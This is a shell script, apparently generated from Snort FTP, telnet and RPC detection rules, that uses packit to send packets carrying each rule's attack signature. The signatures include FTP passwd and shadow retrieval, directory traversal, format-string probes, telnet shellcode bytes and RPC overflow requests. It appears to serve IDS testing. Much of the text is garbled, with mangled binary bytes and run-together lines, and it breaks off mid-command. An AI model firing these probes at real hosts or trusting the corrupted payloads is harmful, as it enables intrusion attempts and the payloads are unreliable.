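packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p "%p" # "FTP format string attempt" nocase-ignored classtype:attempted-admin sid:1530
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p "RNFR " -p " ././" # "FTP RNFR ././ attempt" nocase-ignored nocase-ignored classtype:misc-attack sid:1622
#packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 #Cannot convert: Unrecognized flow type to_server,established,no_stream dsize:>100 "FTP command overflow attempt" bugtraq,4638 classtype:protocol-command-decode sid:1748
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p "LIST" -p ".." -p ".." # "FTP LIST directory traversal attempt" cve,CVE-2001-0680 bugtraq,2618 nessus,11112 classtype:protocol-command-decode sid:1992
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p ".forward" # "FTP .forward" arachnids,319 classtype:suspicious-filename-detect sid:334
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p ".rhosts" # "FTP .rhosts" arachnids,328 classtype:suspicious-filename-detect sid:335
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p "authorized_keys" # "FTP authorized_keys" classtype:suspicious-filename-detect sid:1927
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p "RETR" -p "passwd" # "FTP passwd retrieval attempt" nocase-ignored arachnids,213 classtype:suspicious-filename-detect sid:356
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p "RETR" -p "shadow" # "FTP shadow retrieval attempt" nocase-ignored classtype:suspicious-filename-detect sid:1928
#packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p "USER" -p "w0rm" #Cannot convert: pcre:"/^USERs+w0rm/smi" "FTP ADMw0rm ftp login attempt" nocase-ignored nocase-ignored arachnids,01 sid:144 classtype:suspicious-login
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p "PASS ddd@" # "FTP adm scan" arachnids,332 classtype:suspicious-login sid:353
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p "pass -iss@iss" # "FTP iss scan" arachnids,331 classtype:suspicious-login sid:354
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p "pass wh00t" # "FTP pass wh00t" nocase-ignored arachnids,324 classtype:suspicious-login sid:355
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p "pass -cklaus" # "FTP piss scan" classtype:suspicious-login sid:357
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p "pass -saint" # "FTP saint scan" arachnids,330 classtype:suspicious-login sid:358
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p "pass -satan" # "FTP satan scan" arachnids,329 classtype:suspicious-login sid:359
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p "USER" -p "%" -p "%" # "FTP USER format string attempt" nocase-ignored bugtraq,7474 classtype:misc-attack sid:2178
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 21 -p "PASS" -p "%" -p "%" # "FTP PASS format string attempt" nocase-ignored bugtraq,7474 classtype:misc-attack sid:2179

# ---- telnet.rules -----------------------------------------------------------
packit -t TCP -s "$EXTERNAL_NET" -d "$TELNET_SERVERS" --D 23 -p " # Ž#€î#żě‚ŕ֐%ŕ" # "TELNET Solaris memory mismanagement exploit attempt" classtype:shellcode-detect sid:1430
packit -t TCP -s "$EXTERNAL_NET" -d "$TELNET_SERVERS" --D 23 -p "_RLD" -p "bin/sh" # "TELNET SGI telnetd format bug" arachnids,304 classtype:attempted-admin sid:711
packit -t TCP -s "$EXTERNAL_NET" -d "$TELNET_SERVERS" --D 23 -p "ld_library_path" # "TELNET ld_library_path" cve,CVE-1999-0073 arachnids,367 classtype:attempted-admin sid:712
packit -t TCP -s "$EXTERNAL_NET" -d "$TELNET_SERVERS" --D 23 -p "˙ó˙ó˙ó˙ó˙ó" # "TELNET livingston DOS" arachnids,370 classtype:attempted-dos sid:713
packit -t TCP -s "$EXTERNAL_NET" -d "$TELNET_SERVERS" --D 23 -p "resolv_host_conf" # "TELNET resolv_host_conf" arachnids,369 classtype:attempted-admin sid:714
packit -t TCP -s "$TELNET_SERVERS" --S 23 -d "$EXTERNAL_NET" -p "to su root" # "TELNET Attempted SU from wrong group" nocase-ignored classtype:attempted-admin sid:715
packit -t TCP -s "$TELNET_SERVERS" --S 23 -d "$EXTERNAL_NET" -p "not on system console" # "TELNET not on console" nocase-ignored arachnids,365 classtype:bad-unknown sid:717
packit -t TCP -s "$TELNET_SERVERS" --S 23 -d "$EXTERNAL_NET" -p "Login incorrect" # "TELNET login incorrect" arachnids,127 classtype:bad-unknown sid:718
packit -t TCP -s "$TELNET_SERVERS" --S 23 -d "$EXTERNAL_NET" -p "login: root" # "TELNET root login" classtype:suspicious-login sid:719
packit -t TCP -s "$TELNET_SERVERS" --S 23 -d "$EXTERNAL_NET" -p " [Yes] ˙ţ˙ý&" # "TELNET bsd telnet exploit response" classtype: attempted-admin bugtraq,3064 cve,CAN-2001-0554 sid:1252
#packit -t TCP -s "$EXTERNAL_NET" -d "$TELNET_SERVERS" --D 23 -p "˙ö˙ö˙ű˙ö" #Cannot convert: dsize:>200 "TELNET bsd exploit client finishing" classtype:successful-admin sid:1253 bugtraq,3064 cve,CAN-2001-0554
packit -t TCP -s "$EXTERNAL_NET" -d "$TELNET_SERVERS" --D 23 -p "4Dgifts" # "TELNET 4Dgifts SGI account attempt" cve,CAN-1999-0501 classtype:suspicious-login sid:709
packit -t TCP -s "$EXTERNAL_NET" -d "$TELNET_SERVERS" --D 23 -p "OutOfBox" # "TELNET EZsetup account attempt" cve,CAN-1999-0501 classtype:suspicious-login sid:710
packit -t TCP -s "$TELNET_SERVERS" --S 23 -d "$EXTERNAL_NET" -p "˙ý˙ý˙ý#˙ý'˙ý\$" # "TELNET access" arachnids,08 cve,CAN-1999-0619 classtype:not-suspicious sid:716

# ---- rpc.rules --------------------------------------------------------------
# NOTE(review): the payload arguments below are "† " followed by empty -p ""
# arguments; the empty ones look like NUL bytes dropped during conversion, so
# these packets may not carry a well-formed RPC header. Verify before use.
#packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 111 -p "† " -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_test:4,>,2048,12,relative "RPC portmap proxy integer overflow attempt TCP" cve,CAN-2003-0028 bugtraq,7123 classtype:rpc-portmap-decode sid:2093
#packit -t UDP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 111 -p "† " -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_test:4,>,2048,12,relative "RPC portmap proxy integer overflow attempt UDP" classtype:rpc-portmap-decode cve,CAN-2003-0028 bugtraq,7123 sid:2092
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 111 -p "† " -p "" -p "" # "RPC portmap proxy attempt TCP" classtype:rpc-portmap-decode sid:1922
packit -t UDP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 111 -p "† " -p "" -p "" # "RPC portmap proxy attempt UDP" classtype:rpc-portmap-decode sid:1923
packit -t UDP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 111 -p "† " -p "" -p "" # "RPC portmap listing UDP 111" arachnids,428 classtype:rpc-portmap-decode sid:1280
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 111 -p "† " -p "" -p "" # "RPC portmap listing TCP 111" arachnids,428 classtype:rpc-portmap-decode sid:598
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 111 -p "† " -p "" -p "" # "RPC portmap SET attempt TCP 111" classtype:rpc-portmap-decode sid:1949
packit -t UDP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 111 -p "† " -p "" -p "" # "RPC portmap SET attempt UDP 111" classtype:rpc-portmap-decode sid:1950
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 111 -p "† " -p "" -p "" # "RPC portmap UNSET attempt TCP 111" bugtraq,1892 classtype:rpc-portmap-decode sid:2014
packit -t UDP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 111 -p "† " -p "" -p "" # "RPC portmap UNSET attempt UDP 111" bugtraq,1892 classtype:rpc-portmap-decode sid:2015
packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 32771 -p "† " -p "" -p "" # "RPC portmap listing TCP 32771" arachnids,429 classtype:rpc-portmap-decode sid:599
packit -t UDP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 32771 -p "† " -p "" -p "" # "RPC portmap listing UDP 32771" arachnids,429 classtype:rpc-portmap-decode sid:1281
#packit -t UDP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 111 -p "† " -p "" -p "‡‹" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap cachefsd request UDP" cve,CAN-2002-0084 bugtraq,4674 classtype:rpc-portmap-decode sid:1746
#packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 111 -p "† " -p "" -p "‡‹" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap cachefsd request TCP" cve,CAN-2002-0084 bugtraq,4674 classtype:rpc-portmap-decode sid:1747
#packit -t UDP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 111 -p "† " -p "" -p "†¨" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap rwalld request UDP" classtype:rpc-portmap-decode sid:1732
#packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 111 -p "† " -p "" -p "†¨" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap rwalld request TCP" classtype:rpc-portmap-decode sid:1733
#packit -t UDP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 111 -p "† " -p "" -p "†÷" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap admind request UDP" arachnids,18 classtype:rpc-portmap-decode sid:575
#packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 111 -p "† " -p "" -p "†÷" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap admind request TCP" arachnids,18 classtype:rpc-portmap-decode sid:1262
#packit -t UDP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 111 -p "† " -p "" -p "‡" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap amountd request UDP" arachnids,19 classtype:rpc-portmap-decode sid:576
#packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 111 -p "† " -p "" -p "‡" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap amountd request TCP" arachnids,19 classtype:rpc-portmap-decode sid:1263
#packit -t UDP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 111 -p "† " -p "" -p "†ş" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap bootparam request UDP" cve,CAN-1999-0647 arachnids,16 classtype:rpc-portmap-decode sid:577
#packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 111 -p "† " -p "" -p "†ş" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap bootparam request TCP" cve,CAN-1999-0647 arachnids,16 classtype:rpc-portmap-decode sid:1264
#packit -t UDP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 111 -p "† " -p "" -p "‡Ě" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap nisd request UDP" arachnids,21 classtype:rpc-portmap-decode sid:580
#packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 111 -p "† " -p "" -p "‡Ě" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap nisd request TCP" arachnids,21 classtype:rpc-portmap-decode sid:1267
#packit -t UDP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 111 -p "† " -p "" -p "Iń" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap pcnfsd request UDP" arachnids,22 classtype:rpc-portmap-decode sid:581
#packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 111 -p "† " -p "" -p "Iń" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap pcnfsd request TCP" arachnids,22 classtype:rpc-portmap-decode sid:1268
#packit -t UDP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 111 -p "† " -p "" -p "†ą" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap rexd request UDP" arachnids,23 classtype:rpc-portmap-decode sid:582
#packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 111 -p "† " -p "" -p "†ą" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap rexd request TCP" arachnids,23 classtype:rpc-portmap-decode sid:1269
#packit -t UDP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 111 -p "† " -p "" -p "†˘" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap rusers request UDP" cve,CVE-1999-0626 arachnids,133 classtype:rpc-portmap-decode sid:584
#packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 111 -p "† " -p "" -p "†˘" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap rusers request TCP" cve,CVE-1999-0626 arachnids,133 classtype:rpc-portmap-decode sid:1271
packit -t UDP -s "$EXTERNAL_NET" -d "$HOME_NET" -p "†˘" -p "" -p "" # "RPC rusers query UDP" cve,CVE-1999-0626 classtype:attempted-recon sid:612
#packit -t UDP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 111 -p "† " -p "" -p "†Ż" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap selection_svc request UDP" arachnids,25 classtype:rpc-portmap-decode sid:586
#packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 111 -p "† " -p "" -p "†Ż" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap selection_svc request TCP" arachnids,25 classtype:rpc-portmap-decode sid:1273
#packit -t UDP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 111 -p "† " -p "" -p "†¸" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap status request UDP" arachnids,15 classtype:rpc-portmap-decode sid:587
#packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 111 -p "† " -p "" -p "†¸" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap status request TCP" arachnids,15 classtype:rpc-portmap-decode sid:2016
#packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 111 -p "† " -p "" -p "‡™" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap snmpXdmi request TCP" cve,CAN-2001-0236 url,www.cert.org/advisories/CA-2001-05.html bugtraq,2417 classtype:rpc-portmap-decode sid:593
#packit -t UDP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 111 -p "† " -p "" -p "‡™" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap snmpXdmi request UDP" cve,CAN-2001-0236 url,www.cert.org/advisories/CA-2001-05.html bugtraq,2417 classtype:rpc-portmap-decode sid:1279
#packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" -p "‡™" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_test:4,>,1024,20,relative "RPC snmpXdmi overflow attempt TCP" bugtraq,2417 cve,CAN-2001-0236 url,www.cert.org/advisories/CA-2001-05.html classtype:attempted-admin sid:569
#packit -t UDP -s "$EXTERNAL_NET" -d "$HOME_NET" -p "‡™" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_test:4,>,1024,20,relative "RPC snmpXdmi overflow attempt UDP" bugtraq,2417 cve,CAN-2001-0236 url,www.cert.org/advisories/CA-2001-05.html classtype:attempted-admin sid:2045
#packit -t UDP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 111 -p "† " -p "" -p "÷u" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap espd request UDP" cve,CAN-2001-0331 classtype:rpc-portmap-decode sid:2017
#packit -t TCP -s "$EXTERNAL_NET" -d "$HOME_NET" --D 111 -p "† " -p "" -p "÷u" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap espd request TCP" cve,CAN-2001-0331 classtype:rpc-portmap-decode sid:595
#packit -t UDP -s "$EXTERNAL_NET" -d "$HOME_NET" --D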
1024: -p "†¸" -p "" -p "%x %x" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC status GHBN format string attack" bugtraq,1480 cve,CVE-2000-0666 classtype:misc-attack sid:1890 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 1024: -p "†¸" -p "" -p "%x %x" -p "" #Cannot convert: Unrecognized flow type to_server, established byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC status GHBN format string attack" bugtraq,1480 cve,CVE-2000-0666 classtype: misc-attack sid:1891 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†Ľ" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap mountd request UDP" arachnids,13 classtype:rpc-portmap-decode sid:579 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†Ľ" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap mountd request TCP" arachnids,13 classtype:rpc-portmap-decode sid:1266 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "†Ľ" -p "" -p "" # "RPC mountd TCP export request" arachnids,26 classtype:attempted-recon sid:574 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "†Ľ" -p "" -p "" # "RPC mountd UDP export request" arachnids,26 classtype:attempted-recon sid:1924 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "†Ľ" -p "" -p "" # "RPC mountd TCP exportall request" arachnids,26 classtype:attempted-recon sid:1925 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "†Ľ" -p "" -p "" # "RPC mountd UDP exportall request" arachnids,26 classtype:attempted-recon sid:1926 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "†Ľ" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_test:4,>,1023,0,relative "RPC mountd TCP mount path overflow attempt" sid:2184 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "†Ľ" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_test:4,>,1023,0,relative "RPC mountd UDP 
mount path overflow attempt" classtype:misc-attack sid:2185 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "†Ľ" -p "" -p "" # "RPC mountd TCP mount request" classtype:attempted-recon sid:1951 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "†Ľ" -p "" -p "" # "RPC mountd UDP mount request" classtype:attempted-recon sid:1952 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "†Ľ" -p "" -p "" # "RPC mountd TCP dump request" classtype:attempted-recon sid:2018 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "†Ľ" -p "" -p "" # "RPC mountd UDP dump request" classtype:attempted-recon sid:2019 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "†Ľ" -p "" -p "" # "RPC mountd TCP unmount request" classtype:attempted-recon sid:2020 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "†Ľ" -p "" -p "" # "RPC mountd UDP unmount request" classtype:attempted-recon sid:2021 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "†Ľ" -p "" -p "" # "RPC mountd TCP unmountall request" classtype:attempted-recon sid:2022 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "†Ľ" -p "" -p "" # "RPC mountd UDP unmountall request" classtype:attempted-recon sid:2023 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 500: -p "“ó" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_test:4,>,512,0,relative "RPC AMD UDP amqproc_mount plog overflow attempt" cve,CVE-1999-0704 bugtraq,614 classtype:misc-attack sid:1905 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 500: -p "“ó" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_test:4,>,512,0,relative "RPC AMD TCP amqproc_mount plog overflow attempt" cve,CVE-1999-0704 bugtraq,614 classtype:misc-attack sid:1906 packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 500: -p "“ó" -p " " -p "" # "RPC AMD TCP pid request" classtype:rpc-portmap-decode sid:1953 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 500: -p "“ó" -p " " -p "" # "RPC AMD UDP pid request" classtype:rpc-portmap-decode sid:1954 packit -t TCP 
-s $EXTERNAL_NET -d $HOME_NET --D 500: -p "“ó" -p "" -p "" # "RPC AMD TCP version request" classtype:rpc-portmap-decode sid:1955 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 500: -p "“ó" -p "" -p "" # "RPC AMD UDP version request" classtype:rpc-portmap-decode sid:1956 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†ä" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap cmsd request UDP" arachnids,17 classtype:rpc-portmap-decode sid:578 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†ä" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap cmsd request TCP" arachnids,17 classtype:rpc-portmap-decode sid:1265 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "†ä" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_test:4,>,1024,0,relative "RPC CMSD UDP CMSD_CREATE buffer overflow attempt" cve,CVE-1999-0696 bugtraq,524 classtype:attempted-admin sid:1907 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "†ä" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_test:4,>,1024,0,relative "RPC CMSD TCP CMSD_CREATE buffer overflow attempt" cve,CVE-1999-0696 bugtraq,524 classtype:attempted-admin sid:1908 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "†ä" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_test:4,>,1024,20,relative "RPC CMSD UDP CMSD_CREATE array buffer overflow attempt" cve,CAN-2002-0391 bugtraq,5356 classtype:attempted-admin sid:2094 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "†ä" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_test:4,>,1024,20,relative "RPC CMSD TCP CMSD_CREATE array buffer overflow attempt" cve,CAN-2002-0391 bugtraq,5356 classtype:attempted-admin sid:2095 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "†ä" -p "" -p "" #Cannot convert: 
byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_jump:4,0,relative,align byte_test:4,>,1000,28,relative "RPC CMSD TCP CMSD_INSERT buffer overflow attempt" cve,CVE-1999-0696 url,www.cert.org/advisories/CA-99-08-cmsd.html classtype:misc-attack sid:1909 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "†ä" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_jump:4,0,relative,align byte_test:4,>,1000,28,relative "RPC CMSD udp CMSD_INSERT buffer overflow attempt" cve,CVE-1999-0696 url,www.cert.org/advisories/CA-99-08-cmsd.html classtype:misc-attack sid:1910 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "‡ˆ" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap sadmind request TCP" arachnids,20 classtype:rpc-portmap-decode sid:1272 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "‡ˆ" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap sadmind request UDP" arachnids,20 classtype:rpc-portmap-decode sid:585 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "‡ˆ" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_jump:4,124,relative,align byte_jump:4,20,relative,align byte_test:4,>,512,4,relative "RPC sadmind UDP NETMGT_PROC_SERVICE CLIENT_DOMAIN overflow attempt" cve,CVE-1999-0977 bugtraq,866 classtype:attempted-admin sid:1911 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "‡ˆ" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_jump:4,124,relative,align byte_jump:4,20,relative,align byte_test:4,>,512,4,relative "RPC sadmind TCP NETMGT_PROC_SERVICE CLIENT_DOMAIN overflow attempt" cve,CVE-1999-0977 bugtraq,866 classtype:attempted-admin sid:1912 packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "‡ˆ" -p "" -p "" # "RPC sadmind UDP PING" bugtraq,866 classtype:attempted-admin sid:1957 packit -t TCP -s $EXTERNAL_NET -d 
$HOME_NET -p "‡ˆ" -p "" -p "" # "RPC sadmind TCP PING" bugtraq,866 classtype:attempted-admin sid:1958 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†Ą" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap rstatd request UDP" arachnids,10 classtype:rpc-portmap-decode sid:583 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†Ą" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap rstatd request TCP" arachnids,10 classtype:rpc-portmap-decode sid:1270 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "†¸" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_test:4,>,100,0,relative "RPC STATD UDP stat mon_name format string exploit attempt" cve,CVE-2000-0666 bugtraq,1480 classtype:attempted-admin sid:1913 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "†¸" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_test:4,>,100,0,relative "RPC STATD TCP stat mon_name format string exploit attempt" cve,CVE-2000-0666 bugtraq,1480 classtype:attempted-admin sid:1914 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "†¸" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_test:4,>,100,0,relative "RPC STATD UDP monitor mon_name format string exploit attempt" cve,CVE-2000-0666 bugtraq,1480 classtype:attempted-admin sid:1915 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "†¸" -p "" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align byte_test:4,>,100,0,relative "RPC STATD TCP monitor mon_name format string exploit attempt" cve,CVE-2000-0666 bugtraq,1480 classtype:attempted-admin sid:1916 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†ź" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap ypupdated request UDP" arachnids,125 
classtype:rpc-portmap-decode sid:1277 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†ź" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap ypupdated request TCP" arachnids,125 classtype:rpc-portmap-decode sid:591 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET -p "†ź" -p "" -p " -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align check backslash escaping. "RPC ypupdated arbitrary command attempt UDP" classtype:misc-attack sid:2088 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET -p "†ź" -p "" -p " -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align check backslash escaping. "RPC ypupdated arbitrary command attempt TCP" classtype:misc-attack sid:2089 #packit -t UDP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†Ł" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap NFS request UDP" classtype:rpc-portmap-decode sid:1959 #packit -t TCP -s $EXTERNAL_NET -d $HOME_NET --D 111 -p "† " -p "" -p "†Ł" -p "" #Cannot convert: byte_jump:4,4,relative,align byte_jump:4,4,relative,align "RPC portmap NFS request TCP" classtype:rpc-portmap-decode sid:1960 #packit -t UDP -s $EXTERNAL_NET -d 